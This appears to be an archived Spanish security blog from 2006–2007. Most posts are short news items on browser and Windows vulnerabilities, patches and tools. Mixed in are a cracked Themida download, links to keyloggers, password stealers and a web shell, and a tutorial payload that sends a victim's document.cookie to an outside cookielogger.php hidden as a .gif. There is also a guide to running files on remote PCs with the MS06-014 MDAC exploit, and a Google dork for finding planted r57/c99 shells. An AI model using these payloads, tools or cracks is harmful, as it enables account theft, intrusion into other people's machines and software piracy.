[in]Seguridad Informatica...

Themida v1.8.5.5 [Crackeado]

2007-06-29T20:42:00.000-03:00

DownloadACTUALIZACION V. 1.9.1.0 - Download

Buscan Hacker...

2007-06-28T20:06:00.000-03:00

Una empresa inglesa busca un "hacker" para mejorar o rehacer páginas webs seguras. Los candidatos que se ajusten al perfil deberían encontrar facilmente la dirección a la que enviar su curriculum en la siguiente cadena de texto: 43616c6c204a756c69616e206f6e20303230203739323420363632206f7220656d61696c206a756c69616e406c6f6e7265732e636f6d Solo admiten curriculums en texto plano o pdf.Aviso

Ip Anonymous Surfing Tools

2007-06-23T21:05:00.000-03:00

Download o Download o DownloadPass: http://www.2baksa.net/

Error en GOOGLE

2007-06-23T20:58:00.000-03:00

Si utilizamos la siguiente busqueda en GOOGLE se obtiene una larga lista de contraseñas de FTPfuente:meneame

Hotmail and Windows Live Mail XSS Vulnerabilities

2006-11-08T00:14:00.000-03:00

El filtro de Hotmail identifica la sintaxis "expression()" en un atributo de CSS. Según el descubridor,en algunas codificaciones de carácteres (por ejemplo. GB2312), podemos substituir algunos double-byte chars especiales por los chars correspondientes en la "expression()". En este caso, podemos crear un atributo de CSS mal formado,el cual el filtro de Hotmail falla en inspeccionar y filtrar la

Código que desactiva el firewall de Windows.

2006-11-04T23:58:00.000-03:00

Varias personas han publicado el código que podría permitir a un atacante inhabilitar el firewall de Windows en ciertas máquinas con Windows XP.El exploit, que fue publicado en Internet el pasado 29 de octubre, se podría utilizar para inhabilitar el cortafuegos de Windows en una PC completamente actualizada con Windows XP, en la que funcione el servicio de conexión de Internet de Windows (ICS).

IE 7: Aparecen Bugs Nº 1

2006-10-21T19:32:00.000-03:00

Secunia ha informado de una vulnerabilidad que permite mostrar información sensible del usuario de la máquina, debido a un error en el manejo de las redirecciones. El atacante ’solo’ puede acceder a documentos que tengas en la cache de visitar otras webs. Le han puesto una calificación de gravedad de 2/5. Lo desesperante es que Thomas Kristensen (CTO de Secunia), afirmó que ‘ya habia información

Esconder ficheros RAR en imágenes JPEG

2006-10-18T22:55:00.000-03:00

En TheTechtTray, han creado un videotutorial en el que se explica como enmascarar archivos de WinRAR tras imágenes JPEG. A grandes rasgos, el sistema consiste en crear el archivo RAR, para despues ejecutar un comando en la consola de Windows para ocultar el archivo tras una imagen. El comando a ejecutar es: copy /b IMAGEN + ARCHIVO DESTINO.Una vez terminado, tendremos una imagen normal y

Los hackers aprenden a camuflar el código de sus ataques

2006-10-18T22:18:00.000-03:00

Un grupo de hackers están desarrollando un nuevo tipo de software que esconde el código de sus ataques a las compañías de seguridad. El software, denominado VoMM (eVade o’ Matic Module), utiliza diversas técnicas para combinar el código de varias vulnerabilidades, de forma que las soluciones antivirus no sean capaces de reconocerlo. Al utilizar estas técnicas, VoMM “puede crear un número

El fallo de Firefox que nunca existio...

2006-10-04T21:36:00.000-03:00

Un par de investigadores habían descubierto una grave vulnerabilidad en Firefox que permitía la ejecución remota de código gracias a un fallo en el interprete de Javascript que, además según ellos, era casi imposible de subsanar. Pues resulta que tal vulnerabilidad, en realidad, no existe. Si que existe un problema que provoca el “cuelgue” del navegador, pero no han conseguido ejecutar código a

WGA Notification v1.5.708.0

2006-10-04T21:23:00.000-03:00

Download

Parche para VML Exploit

2006-09-22T23:47:00.000-03:00

ZERT (Zeroday Emergency Response Team), un equipo de expertos en seguridad informatica e ingieneria inversa ha lanzado un pach no oficial para la vulnerabilidad 0-day de Internet Explorer .El parche (no oficial) pueden descargarlo del link directo (archivo zert2006-01.zip) o directamente de la pagina de download. Para comprobar la vulnerabilidad de vuestro browser al VML Exploit o para asegurarse

Hacking Tools

2006-09-22T23:41:00.000-03:00

NETWORK SNIFFERS 2007DownloadPass:666666------------------------------------------------------------------------------------------Password Hacking ToolsDownload o Download

Multiples browsers Dialog Origin Spoofing Vulnerability

2006-09-18T20:29:00.000-03:00

Secunia ha descubierto una vulnerabilidad en Mozilla, Firefox, Camino, y Internet Explorer que puede ser explotado por sitios web malévolos atraves de spoof de cuadros de diálogo.El problema es que los cuadros de diálogo JavaScript no muestran o incluyen su origen, que permite a una nueva ventana abrir por ejemplo un cuadro de diálogo que parece ser de un sitio de confiaza.La explotación acertada

Multiples Vulnerabilidades en Adobe PDF

2006-09-17T17:52:00.000-03:00

Segun un articulo publicado en eWeek un investigador britanico ha realizado una PoC para demostrar como se puede aprovechar la vulnerabilidad de cierto software, en este caso Adobe PDF, para realizar un backdoor en un simple archivo pdf.Prueba de Concepto 1Prueba de Concepto 2He intentado el lanzamiento de las pruebas de concepto, en ambos casos, se cargó automáticamente la página con Google

tool: Nmap Grafico

2006-09-17T17:34:00.000-03:00

Fruto del programa Summer of Code 2006 de Google Code acaba de ver la luz uno de los desarrollos alrededor de nmap que han sido becados este año: UMIT (antes llamado NmapFE++), un nuevo front end para nmap escrito en Phyton y que usa las GTK. El anuncio oficial de Adriano Monteiro, el autor, aquí. La instalación es muy sencilla. Las dependencias están bien explicitadas (aunque no vendría de más

Tres boletines de seguridad en septiembre

2006-09-13T18:54:00.000-03:00

Se han publicado los boletines MS06-052 al MS06-054 y las actualizaciones distribuidas, según la propia clasificación de Microsoft, una es de gravedad "crítica", otra está calificada como "importante" y la última queda clasificada como "moderada".* MS06-052: Evita una vulnerabilidad en el protocolo PGM (Reliable Multicast Program) que podría permitir la ejecución de código arbitrario si un

MS IExplorer Daxctle.OCX Heap Buffer Overflow vulnerability.

2006-09-13T18:32:00.000-03:00

Microsoft Internet Explorer es propenso a una vulnerabilidad de heap buffer-overflow.La vulnerabilidad surge debido al modo que Internet Explorer maneja a ciertos objetos de COM como objetos de ActiveX.Un atacante puede explotar esta cuestion para ejecutar código arbitrario dentro del contexto de la aplicacion afectada. Tentativas de ataques fracasadas causarán una condición de

Protegiendose del malware a través de privilegios

2006-09-12T21:06:00.000-03:00

En Windows, por defecto, todos los ejecutables disponen de los mismos permisos a la hora de ser lanzados. Esto provoca serios problemas de seguridad. ¿Porqué debería tener el mismo nivel de acceso a nuestro ordenador un programa en el que confiamos plenamente, pongamos por caso el bloc de notas (por poner un ejemplo simple) que otro que nos acabamos de bajar y del cual todavía no nos fiamos

Winup, los parches de Microsoft sin Windows Update

2006-09-10T12:10:00.000-03:00

Winup es un práctico pack que contiene todos los parches oficiales de Microsoft para Windows XP, que nos evita tener que descargarlos a través de Windows Update.Ideal para usuarios que requieren instalar parches de Windows XP en máquinas sin Internet o usuarios domésticos.Contiene todos los parches de Microsfot para Windows XP SP2, a excepción del KB905474, destinado a comprobar si Windows XP es

Online SCan Tools

2006-09-10T11:25:00.000-03:00

Download

El parche de seguridad mas rapido...

2006-09-09T19:56:00.000-03:00

Microsoft normalmente tarda en promedio un mes en parchar por medio de una actualización de sistema los problemas de seguridad en el software que producen, esto significa que el usuario en promedio tiene unos treinta días, 720 horas, 43,200 minutos con un sistema vulnerable cada cierto tiempo (considerando que siembre descarga/instala las actualizaciones). Pero la semana pasada Microsoft tardó

Hacking Tools

2006-08-31T18:01:00.000-03:00

MSN Messenger Password RecoveryDownload-----------------------------------------------------------------------------------------Tong Key Logger v1.0Download-----------------------------------------------------------------------------------------IProtect 1.0Download------------------------------------------------------------------------------------------Shell Created by. Force-SniperDownloadPW:

Internet Explorer DoS

2006-08-31T17:23:00.000-03:00

Es posible producir una condicion de denegacion de servicio en Internet Explorer, utilizando una simple linea de codigo javascript.Esto se logra haciendo uso del el método 'document.write', como un texto de salida a un documento.Testeado en Internet Explorer 6.0.xPrueba de Concepto

Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability

2006-08-28T14:38:00.000-03:00

Cuando Internet Explorer maneja DirectAnimation. PathControl COM, objeto (daxctle.ocx), el primer parámetro a 0xffffffff va a escribir una memoria inválida. Un atacante puede realizar un DOS y posiblemente podría ejecutar código arbitrario.Prueba de Concepto

Palary, el navegador web online...

2006-08-27T17:00:00.000-03:00

Se trata de un navegador web que nos permite navegar por las páginas que deseemos de manera segura, privada y sin restricciones de ningún tipo.Navegando a través de este navegador web online evitamos ataques que provengan desde la web, por la deshabilitación de javascript, evitamos también el control de nuestro historial de navegación, saltamos los bloqueos que nos impone nuestros isp y no

Por qué Firefox cuenta hasta 3 antes de que instales una extensión

2006-08-27T12:17:00.000-03:00

Via menéame, se resuelve el interrogante de por qué tenemos que esperar 3 segundos cuando instalamos una extensión en Firefox.No es un capricho de los programadores, es una medida de seguridad para impedir que se ejecute código que no es de confianza.En concreto la vulnerabilidad ya corregida, se resume en que podrían existir páginas maliciosas que usan falsos CAPTCHAs como "only" y que al

Hacme Bank y Hacme Casino, aplicaciones para vulnerar y aprender

2006-08-27T12:09:00.000-03:00

A través de www.webappsec.org y www.securityfocus.org me entero de esta nueva aplicación para probar nuestros conocimientos encontrando vulnerabilidades en aplicaciones web.Hacme Casino es la continuación de Hacme Bank, aplicaciones con vulnerabilidades colocadas para encontrarlas y aprender lo que no debe hacerse cuando se desarrolla.Hacme Bank se puede encontrar aquíLa guía de Hacme Bank

Hacking Tools

2006-08-25T18:12:00.000-03:00

SQLNINJA 0.1.0 alphaSqlninja es una pequeña herramienta para explotar vulnerabilidades de Inyección SQL sobre una aplicacion web que usa Microsoft SQL como Servidor.Su objetivo principal es de proporcionar una shell remota sobre el servidor vulnerable, aún en un ambiente muy hostil (p. ej.: con ajustes de firewall), usando el xp_cmdshell que el servidor SQL amablemente permite por defecto.Download

Detectando Internet Explorer...

2006-08-23T20:40:00.000-03:00

Internet Explorer expone unas imágenes que le permiten ver si el navegador es de hecho Internet Explorer independientemente de cosas como espiar el User-Agent en una pagina web.Desde luego hay docenas de modos de hacer esto pero usando:res://shdoclc.dll/refresh.gif ,res: // shdoclc.dll/search.gif,res: // shdoclc.dll/pagerror.gif,res: // shdoclc.dll/back.gif y otros, usted consigue el mismo

Detectando Extensiones en Firefox...

2006-08-23T16:52:00.000-03:00

En Firefox (con JavaScript conectado) pulsando sobre la prueba de concepto se puede mostrar los plugins que usted puede tener instalado.El saber lo que su objetivo ha instalado es un modo de tomar las huellas digitales al usuario así como un modo de evitar ajustes de seguridad que ellos puedan tener. Sabiendo lo que ellos han instalado puede ayudarle a planificar, bypass alrededor de ello, o

Super AIO security 2006

2006-08-22T19:46:00.000-03:00

Parte 1Parte 2Parte 3Parte 4pass unrar : tqk-tvk

BlackHat 2006

2006-08-20T21:13:00.000-03:00

En el siguiente enlace podran descargar las ponencias (en Pdf), como asi tambien las herramientas, pruebas de concepto y exploits, de los diversos expositores a esta conferencia que se realizo en USA.BH 2006

Como Funciona Una Cookie persistente???

2006-08-20T20:01:00.000-03:00

Esto es una demostración de persistencia. Después de que usted ingrese la información que quiera, haga click en "save". Entonces cierre la pagina o solamente quite la información de la caja de entrada y al hacer click en "recall" recordará la información que usted almaceno. Esto unicamente trabaja en Internet Explorer, pero se demuestra como un usuario puede tener su información almacenada fuera

Paper: ¨Robando¨ Cookies en un Forum con una Imagen Gif...

2006-08-20T18:34:00.000-03:00

1.- Abrimos un editor de textos (notepad) y escribimos:location.href='http://www.yoursite.com/cookielogger.php?cookie='+escape(document.cookie)guardamos y renombramos como ¨algo¨.Gif2.- Ahora creamos nuestro archivo cookielogger con lo siguiente:

Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)

2006-08-20T18:22:00.000-03:00

Exploit

Simple Machines Forum <= 1.1 rc2 "lngfile" Exploit Remoto...

2006-08-20T18:17:00.000-03:00

Exploit

MS IE 6.0.x Denial Of Service...

2006-08-13T11:37:00.000-03:00

Prueba de Concepto

MS Help (WINHLP32.EXE) Remote Code Execution and Denial Of Service

2006-08-12T18:32:00.000-03:00

Múltiple ejecución de código remota y denegacion de servicio, existen en la Ayuda de Microsoft (WINHLP32.EXE) debido a la forma en que esto maneja archivos de Ayuda de Windows (*.HLP).Un atacante podría explotar esto colocando un archivo de ayuda un una webpage, o enviando al archivo como un accesorio en un correo electrónico. La cuestion es provocada solo viendo el archivo de ayuda. No requiere

Mozilla Firefox JavaScript Handler Race Condition Memory Corruption Vulnerability

2006-08-12T18:06:00.000-03:00

Mozilla Firefox, en todas sus versiones, incluida la beta 1, es susceptible a una vulnerabilidad de corrupción de memoria remota. Esta cuestion es debido a una race condition que puede causar defectos de corrupción de memoria dobles u otras.Este defecto probablemente puede ser explotado para ejecutar código de máquina arbitrario en el contexto de la aplicacion vulnerable, pero no han confirmado

IE Sidebar Star...

2006-08-12T12:08:00.000-03:00

Antes que salio SP2 esto definitivamente iba a trabajar como un exploit, pero ahora esto requiere la interacción humana y hay restricciones más rigurosas contra la colocación de popups. De todos modos, puede ser explotable.Prueba de Concepto

Hotmail/MSN Cross Site Scripting Vulnerability

2006-08-10T20:31:00.000-03:00

Detalles:El script¨ insite.asp¨ de newsletter.msn.com es propensa a un ataque del tipo XSS. Este problema es debido al fracaso para esterilizar correctamente la entrada suministrada por usuario.Impacto:Un atacante puede explotar esta vulnerabilidad para ejecutar codigo arbitrario en el navegador de un usuario autentificado en el contexto del msn webpage. Podria producir el robo de la cookie de

Scanner y exploit para MS06-040 NetApi32...

2006-08-10T19:10:00.000-03:00

El 8 de agosto de 2006 Microsoft lanzó el boletín MS06-040 de seguridad que trató un defecto crítico en el servidor que permite la ejecución remota de código en sistemas vulnerables. El servicio vulnerable escucha en los puertos 139 y 445 del TCP, y es permitido por el defecto en todos los sistemas de Windows. eEye Digital Security ha creado un scanner para ayudar a identificar los sistemas

Google te advierte de páginas sospechosas

2006-08-10T18:58:00.000-03:00

En alianza con StopBadware.org, Google va a implementar en su buscador una advertencia a los usuarios cuando quieran acceder a través de su buscador a algunas páginas consideradas como distribuidoras de software que se instala en tu ordenador para nada bueno, es decir, badware. De esta forma, Google te advierte del peligro de visitar ese enlace pero no lo elimina de su buscador. Deja así la

MS06-044 - Internet Explorer 5.x

2006-08-08T18:35:00.000-03:00

Microsoft liberó el boletin MS06-044 para solucionar una vulnerabilidad de escalada de privilegio local en Internet Explorer 5 sobre el Windows 2000. Según Microsoft, más de cinco millones de personas todavía usan el servicio de Windows Update con Internet Explorer 5. Esta vulnerabilidad explota un defecto de XSS en el recurso RT_HTML DE UN DLL incluido con el Windows 2000.Prueba de

XSS en sitios de Seguridad...

2006-08-07T14:36:00.000-03:00

SecurityfocusCybertrustTrendmicro

Hacking Tool: Burp suite v1.0

2006-08-05T19:07:00.000-03:00

Burp Suite es una plataforma integrada para atacar aplicaciones web. Esto contiene todos los instrumentos de Burp (proxy, spider, intruder and repeater) con numerosas interfaces entre ellos, diseñado para facilitar y acelerar el proceso de atacar un sitio web.Burp Suite permite a un atacante,combinar técnicas manuales y automatizadas para enumerar, analizar, atacar y explotar aplicaciones web.

Windows Vista, jaqueado en Black Hat

2006-08-04T21:09:00.000-03:00

Tal y como estaba previsto, Microsoft habló sobre la seguridad de Windows Vista en Black Hat. Mientras tanto, en una sala contigua, la investigadora polaca Joanna Rutkowska mostraba cómo utilizar su técnica Blue Pill (más detalles técnicos aquí) para insertar código malicioso en las mismísimas entrañas de una copia de Windows Vista versión 64-bit. Rutkowska encontró una forma de traspasar el

Actualizacion de Windows para Agosto...

2006-08-03T21:00:00.000-03:00

Como la parte del ciclo de liberación del boletín de seguridad mensual, al que Microsoft nos tiene ya acostumbrado, se planea corregir, el proximo 8 de agosto, doce vulnerabilidades, de las cuales:Diez Boletines de Seguridad afectan a Windows.Dos Boletines de Seguridad afectan a Microsoft Office.

Google Dork indexa Malware...

2006-08-03T20:25:00.000-03:00

Google dork es,algo que usuarios malévolos escriben para encontrar máquinas vulnerables.Google trata de poner término a esto, atraves de lo que se conoce como Google Dork Defense System (GDDS), ya sea mostrando un error o simplemente sacandolo del índice.Pero si probamos lo siguiente, podemos observar como google indexa en sus servidores malware...(intitle:r57shell | intitle:c99shell) +unameEsto

Nuevo Firefox 1.5.0.6 RC1 en castellano...

2006-07-31T16:23:00.000-03:00

La Fundación Mozilla ha liberado la Release Candidate 1 de la versión 1.5.0.6 de su navegador Firefox, que ya puede ser libremente descargada.Junto a la versión 1.5.0.5 en castellano, en el servidor FTP de la Fundación Mozilla ya podemos encontrar la Release Candidate 1 que puede ser descargada de AQUI

RemoveWGA 1.2.

2006-07-31T16:18:00.000-03:00

Nueva versión de una utilidad destinada a eliminar los "efectos secundarios" de la protección Windows Genuine Advantage (WGA) de Microsoft.Esta versión de RemoveWGA ahora emplea 3 métodos diferentes de eliminar WGA, dependiendo de la versión de WGA instalada en nuestro sistema.Download

Fake Google Toolbar...

2006-07-31T15:49:00.000-03:00

Se ha reportado una falsificacion del ejecutable de la barra de tareas de google, que oculta un troyano.Era de esperarse...a google se le advirtio¨Si usted pone ejecutables en su web, era cuestion de tiempo que los phishers hagan lo mismo¨.Esto probablemente cae en la categoría de Pharming más bien que de Phishing, como esto en realidad no tiene la intención directamente de comprometerle

Herramienta de Microsoft para bloquear la futura descarga de Internet Explorer 7

2006-07-30T20:52:00.000-03:00

Según los planes de Microsoft la fecha de lanzamiento final para Internet Explorer será en el último trimestre de este año (pero con Microsoft no puedes estar seguro, por ahí te puede salir con que lo posterga hasta marzo del año 2025). Cuando esto pase, quieren estar seguros de que todos los usuarios que tengan Internet Explorer 6, migren a la versión 7, de qué modo lo van a hacer? Por medio de

Guia para ejecutar un archivo en una Pc remota usando el exploit Mdac(ms06-14)...

2006-07-30T19:26:00.000-03:00

En principio debemos descargar las siguientes herramientas:1.Cualquier programa de FTP SERVER, como por ejemplo Serv-U (lo puedes descargar de www.serv-u.com)2.Python 2.4.3 (Download)3.El registro en cualquier DNS dinamico (www.dyndns.com)4.Finalmente descargamos el exploit de AQUIA.-Configuramos el setup del server (Ej:ftp://xxxxxx.ath.cx/).Si utlizas IP dinamica, asegurarse que en el registro

Firefox Javascript navigator Object Code Execution...

2006-07-28T14:53:00.000-03:00

El bug siguiente fue probado sobre Firefox 1.5.0.4 corriendo sobre Windows 2000 SP4,Windows XP SP2, y Gentoo Linux recientemente actualizado. Este bug fue relatado por TippingPoint y fijado en la 1.5.0.5, última liberación de Mozilla Firefox. . El enlace de demostración intentará lanzar "calc.exe" sobre sistemas de Windows y "touch /tmp/METASPLOIT" sobre sistemas Linux.Prueba de ConceptoCreditos

Bug en Yahoo Messenger...

2006-07-28T14:24:00.000-03:00

Se publico una Vulnerabilidad en el messenger de yahoo,que basicamente consistiria en que si usted recibe un mensaje Privado con lo siguiente:(sin las comillas) el Yahoo messenger abrira en este caso google.com en el Internet Explorer de la víctima.Prueba de Concepto:1.- Abrir y loguearse en el messenger de yahoo.2.-Abrir Yahoo chat como yahelite por el protocolo Ymsgr y registrarlo con otra

Hacking Tools

2006-07-27T17:07:00.000-03:00

XCODE v1.0 (version PHP)Download-----------------------------------------------------------------------------------------------NOD32 Anti Virus ExploitDownload-----------------------------------------------------------------------------------------------Yahoo Password SenderDownload

Contraseñas más seguras en Windows Vista...

2006-07-26T20:51:00.000-03:00

Hasta ahora, existían muchos métodos para craquear las contraseñas de los sistemas Windows, incluso Windows XP,heredados del método hash LM de Windows 9x, como Cain,Ophcrack,SAMInside, pwdump, entre otros.Para Windows Vista se ha modificado el formato del registro SAM y SYSTEM, inhabilitado los distintos métodos disponibles hasta el momento para la obtención de las contraseñas del sistema, además

Ser hackeado "al vuelo"

2006-07-25T10:57:00.000-03:00

Este interesante vídeo, exhibido en el McAfee Avert Labs Day, muestra una así llamada infección al vuelo: un sistema es hackeado simplemente al visitar una web especialmente desarrollada. El atacante instala malware e intenta esconder el ataque del sistema y el software de seguridad. El usuario nunca ve avisos de seguridad...Fuente:Un espia en el Silicon Valley.Origen: Kriptopolis

Anonimato: Tork facilita el uso de Tor

2006-07-24T20:34:00.000-03:00

TorK es un controlador para Tor en KDE, que permite manejar, actualizar, monitorizar y controlar Tor. También permite visualizar la red Tor y elegir el modo de interactuar con ella. Para instalar TorK antes hay que bajar el código (versión alpha, 700 KB) y compilarlo al modo habitual. Al arrancar Tork se pone en marcha su asistente, que permite descargar Tor y Privoxy si no se tienen, o señalar

Scrapbook, extensión para Firefox que nos permite coleccionar sitios web

2006-07-23T11:37:00.000-03:00

Scrapbook es una extensión de Firefox que va más allá de los marcadores. Nos permite guardar, gestionar y editar nuestras páginas favoritas a través de Firefox. Sus características son rápidas, ligeras, exactas y tiene soporte multi- idiomas. Sus características principales son: Guardar una página webGuardar un recorte de una página webGuardar el sitio web enteroOrganizar nuestras colecciones

XSS en paypal.com

2006-07-23T11:18:00.000-03:00

alert('www.mousehack.blogspot.com')">Prueba de Concepto

Modificando tu Firefox 2.0... (segunda parte)

2006-07-19T19:23:00.000-03:00

continuando con la posibilidad de modificar la version 2.0 del firefox, podemos hacer lo siguiente:Abrir Etiquetas y Scrolling de EtiquetasLa Caracteristica Abrir Etiqueta Reciente es muy práctico. Esto no recuerda solamente su última etiqueta cerrada como la mayoría de la gente piensa. Podemos seguir seleccionando la opción de Abrir Etiqueta Reciente del menú , con el botón derecho y seguirá

Hacking Tools...

2006-07-19T17:54:00.000-03:00

Hacking Pack v1.0Download----------------------------------------------------------------------------------------SQL toolsDownload----------------------------------------------------------------------------------------Blind SQL inject ToolsDownload

Nuevos rootkits con mejor capacidad de ocultación

2006-07-17T17:17:00.000-03:00

En el mundo de la seguridad informática, algunos pueden parecer muy paranoicos ante amenazas que no son especialmente peligrosas, pero es necesario tener en cuenta que, una vez se ha descubierto un bug o un ataque contra un sistema este ataque tenderá a mejorarse nunca a mitigarse.En el caso de los rootkits, aplicaciones que se instalan en nuestro ordenador sin dejar ningún rastro de su presencia

Seguridad: Anti-Rootkits

2006-07-17T17:13:00.000-03:00

Download

Microsoft retira Private Folders

2006-07-16T13:41:00.000-03:00

Microsoft ha decidido retirarlo a causa de las presiones de clientes corporativos que se quejaron de la dificultad de controlar su uso en los ordenadores de la organización. Las empresas necesitan saber como impedir que los usuarios puedan instalar este programa y que pueden hacer en el caso de que el usuario pierda ficheros al olvidar la contraseña. A causa de esto, el programa dejará de estar

MS IE Denial of Service (FolderItem Access)

2006-07-15T09:33:00.000-03:00

Defecto testeado en Internet Explorer 6, sobre Windows XP SP2 con todas las actualizaciones.Prueba de Concepto

Modificando tu Firefox 2.0...(primera parte)

2006-07-13T20:45:00.000-03:00

Si ya te descargaste la version 2.0 del firefox, que puse en un post anterior, despues de instalarlo, habras notado que la mayoria de las extensiones no funcionan,es decir son incompatibles con esta version.Pues aqui te aconsejo un modo de poder hacerlas compatibles, y conservar la apariencia y el diseño al que nos habiamos acostumbrado en la version anterior.La tarea es sencilla, para ello nos

MS IE Denial Of Service (RevealTrans Transition)

2006-07-13T14:29:00.000-03:00

Este defecto fue probado en la ultima version del Internet Explorer 6 bajo Windows XP SP2 con todos los parches.Prueba de ConceptoCreditos:HDM

Firefox 2.0 beta 1 en castellano.

2006-07-12T21:01:00.000-03:00

Su lanzamiento estaba previsto para ayer día 11 de julio, y aunque una Release Candidate de la beta 1 podía ser descargada desde hace algún tiempo, la oficial no ha estado disponible hasta hoy.Ya está disponible en los servidores FTP de la Fundación Mozilla, beta 1 de "Bon Echo Milestone".Como principales novedades incluye:- Un nuevo instalador NSIS (Nullsoft Scriptable Install System)- Un nuevo

MS IE Denial Of Service ( TriEditDocument URL)

2006-07-12T08:24:00.000-03:00

Probado en Internet Explorer 6 con todos los parches, sobre Windows XP SP2.El ajuste de propiedad URL de este objeto provoca un NULL dereference.Prueba de ConceptoCreditos:HDM

UPHClean: Apagado Rapido de Windows

2006-07-11T23:56:00.000-03:00

Muchas veces Windows tarda bastante en apagarse (del orden de minutos), y a lo mejor te preguntas qué está haciendo para tardar tanto. La respuesta es, la mayoría del tiempo, no está haciendo nada. Para ser más exactos, se queda esperando a que terminen las aplicaciones que tienen bloqueado el perfil, o incluso el registro. Algunas de las aplicaciones de terceros no se cierran todo lo bien que

Path conversion design flaw in Microsoft NTDLL ...

2006-07-11T23:06:00.000-03:00

Microsoft Windows NTDLL.DLL es propenso a una vulnerabilidad de path conversion incorrecta. Este defecto podría ser explotado por usuarios malévolos para evitar mecanismos de protección puestos en práctica por ciertos antivirus y productos antispyware.Hay un defecto de diseño en que NTDLL realiza la conversión de path entre nombres de DOS style path y NT syle path.La vulnerabilidad es localizada

Parches de Julio de Microsoft...

2006-07-11T22:47:00.000-03:00

Esta vez son 5 de gravedad crítica y 2 de gravedad importante.Como ya sabiamos 3 de ellos parchean vulnerabilidades de distintas versiones del paquete Office.Estos son los parches publicados: Gravedad crítica: MS06-035:Vulnerability in Server Service Could Allow Remote Code Execution (917159) MS06-036:Vulnerability in DHCP Client Service Could Allow Remote Code Execution (914388)

Paper: Como Utilizar a Google para un Ataque de Phishing...

2006-07-11T21:53:00.000-03:00

Google y Yahoo tienen un defecto de redireccionamiento de URL que pueden ayudar para un ataque de Phishing, distribución de troyanos, spammers, etc.Si un usuario posiciona su cursor sobre un enlace, este debería mostrarle a donde va a dirijirlo. Pero no siempre es el caso y dos de los motores de búsqueda mas populares, contribuyen al problema.Algunos detalles de estas vulnerabilidades han sido

MS IE Denial Of Service (HtmlDlgSafeHelper fonts)

2006-07-11T08:56:00.000-03:00

Este defecto fue probado en la ultima version del Internet Explorer 6 con todos los parches, sobre Windows XP SP2.El ajuste de la característica "fonts" de este objeto provoca un NULL dereference.Prueba De Concepto

Curiosidad en Google????

2006-07-10T20:28:00.000-03:00

Click

Microsoft Private Folder 1.0

2006-07-10T19:25:00.000-03:00

Tras debutar siendo un producto disponible exclusivamente para el mercado chino, Microsoft ha puesto a disposición de los usuarios de copias legítimas de Windows XP (es decir, previo test WGA) Private Folder 1.0, una utilidad que crea una nueva carpeta (My Private Folder) cuyo contenido está protegido por contraseña.Según Microsoft, se trata de "una herramienta útil para proteger tus datos

hacking Tools...

2006-07-10T19:23:00.000-03:00

PHP InjectDownload-----------------------------------------------------------------------------------------Hack and CrackDownload 1Download 2Download 3-----------------------------------------------------------------------------------------Cigicigi File Crypter v1.0 [+] Cigicigi File Crypter usa el cifrado XOR.[+] Utiliza"user level unhooking" .Lo que permite el baypass del Firewall[+] Cigicigi

MS IE Denial Of Service (Object.Microsoft.DXTFilter Enabled)

2006-07-10T14:47:00.000-03:00

El bug siguiente fue probado sobre la última versión de Internet Explorer 6 sobre Win XP SP2 con todos los parches. Poniendo la propiedad 'Enabled' de este control a un valor verdadero, podemos provocar un NULL dereference.Prueba de ConceptoCreditos:HDM

MS IE Denial Of Service (DirectAnimation.DAUserData )

2006-07-09T17:39:00.000-03:00

El bug siguiente fue probado sobre la última versión de Internet Explorer 6 en Windows XP SP2 con todos los parches. La característica"Data" del objeto DAUserData es diseñada para tener acceso sólo después de que ha sido inicializado.Prueba de ConceptoCreditos:HDM

Siete parches y final para Windows 98, Me y SP1

2006-07-07T15:09:00.000-03:00

Microsoft planea publicar siete parches de seguridad el próximo martes 11 de julio, cuatro de ellos para Windows y tres para Office, según el anuncio de la propia compañía. Es también el final del soporte para Windows 98, 98 SE, Me.El máximo nivel en que están catalogados los parches anunciados, es el de "Crítico", tanto los de Microsoft Windows, como los de Microsoft Office.El final del soporte

MS IE Denial Of service (Table.Frameset)

2006-07-07T14:28:00.000-03:00

El bug siguiente fue probado sobre la última versión de Internet Explorer 6,totalmente parchado,en Windows XP SP2. Este defecto fue encontrado por Aviv Raff usando el Fuzzer Script DOM-HANOI.Prueba de ConceptoCreditos:HDM

MS IE Denial Of Service (StructuredGraphicsControl SourceURL)

2006-07-06T14:48:00.000-03:00

El Bug siguiente fue probado sobre la última versión de Internet Explorer 6 con todos los parches, sobre Windows XP SP2. Este defecto parece ser provocado por una llamada a URLOPENBLOCKINGSTREAM () con un indicador NULO referido por el argumento ppStream.Prueba De ConceptoCreditos:hdm

Vulnerabilidad Cross Site Scripting en Google...

2006-07-05T15:11:00.000-03:00

Google es vulnerable a un ataque del tipo Cross-Site Scripting.Concretamente en la seccion de personalizacion de paginas de google.Los empleados en Google eran conscientes de la posibilidad de XSS y se protegieron contra ello como una condición de error, sin embargo si usted introduce una URL válido, que contiene el Feed de un sitio, esto volverá con la ejecucion del JavaScript que contiene el

GreenBorder Pro: Como proteger tu PC durante la navegación

2006-07-04T15:38:00.000-03:00

Para los que siguen navegando con Internet Explorer, una capa de protección adicional nunca viene mal e, incluso para los que lo hacen con otros navegadores como Opera o Firefox, puede ser necesario algo como GreenBorder Pro si no acabamos de fiarnos de estos navegadores.GreenBorder Pro utiliza la virtualización para proteger nuestro ordenador de los peligros que puedan acecharle cuando estemos

Paper: como funciona una heurística antivirus??? (Segunda Parte)

2006-07-04T14:41:00.000-03:00

Existen 5 métodos típicos que se emplean en matemáticas y estadísticas explotarorias y de modelado. Estos métodos son:* Tabú search (TS, Búsqueda tabú)* Genetic algorithms (GA, Algoritmos genéticos)* Método Hero* Random ascent (RA, Subida azarosa)* Simulated annealing (SA, Temple simulado)La búsqueda tabúEste algoritmo es francamente útil. Teóricamente, se emplea para poder evitar caer en el

MS IE OutlookExpress.AddressBook Denial Of Service...

2006-07-03T15:17:00.000-03:00

El bug siguiente fue probado sobre la última versión de Internet Explorer 6 sobre un Windows 2000 totalmente remendado SP4. Parece haber sido resuelto (vía killbit) en una modernización reciente a Windows XP SP2. Este defecto es uno de muchos que son provocados por el cargado de un objeto Non-ActiveX COM dentro de Internet Explorer.a = new ActiveXControl('OutlookExpress.AddressBook');Prueba de

Internet.HHCtrl Image Property denial of Service....

2006-07-03T15:06:00.000-03:00

El bug siguiente fue probado sobre la última versión de Internet Explorer 6 totalmente remendado sobre XP SP2. Este bug es interesante porque un pequeño heap overflow ocurre cada vez que esta característica es ejecutada. El defecto es difícil de descubrir a no ser que hayan permitido la verificación de heap en las propiedades de ajuste globales para iexplore.exe.Prueba de ConceptoCreditos: hdm

MS IE ADODB.Recordset Filter Property Denial of Service...

2006-07-03T14:49:00.000-03:00

